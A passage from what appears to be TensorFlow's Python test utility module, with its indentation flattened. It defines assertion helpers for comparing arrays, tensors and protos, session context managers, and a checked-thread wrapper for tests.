If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
# Convert tensors and composite tensors to numpy arrays.
return nest.map_structure(lambda t: t.numpy(), tensor,
expand_composites=True)
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""A context manager for a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
``` python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest(
"Tests that have the name \"test_session\" are automatically skipped "
"by TensorFlow test fixture, as the name is reserved for creating "
"sessions within tests. Please rename your test if you have a test "
"with this name.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is tensor-like then convert it to ndarray
if tensor_util.is_tensor(a):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join(str(p) for p in path) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections_abc.Mapping)
if a_is_dict != isinstance(b, collections_abc.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Note: the implementation follows
[`numpy.allclose`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html)
(and numpy.testing.assert_allclose). It checks whether two arrays are
element-wise equal within a tolerance. The relative difference
(`rtol * abs(b)`) and the absolute difference `atol` are added together
to compare against the absolute difference between `a` and `b`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %r. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = %r" % x)
msgs.append("not equal rhs = %r" % y)
# With Python 3, we need to make sure the dtype matches between a and b.
b = b.astype(a.dtype)
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements. %s" % msg)
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3+ compatibility issues
if not six.PY2:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
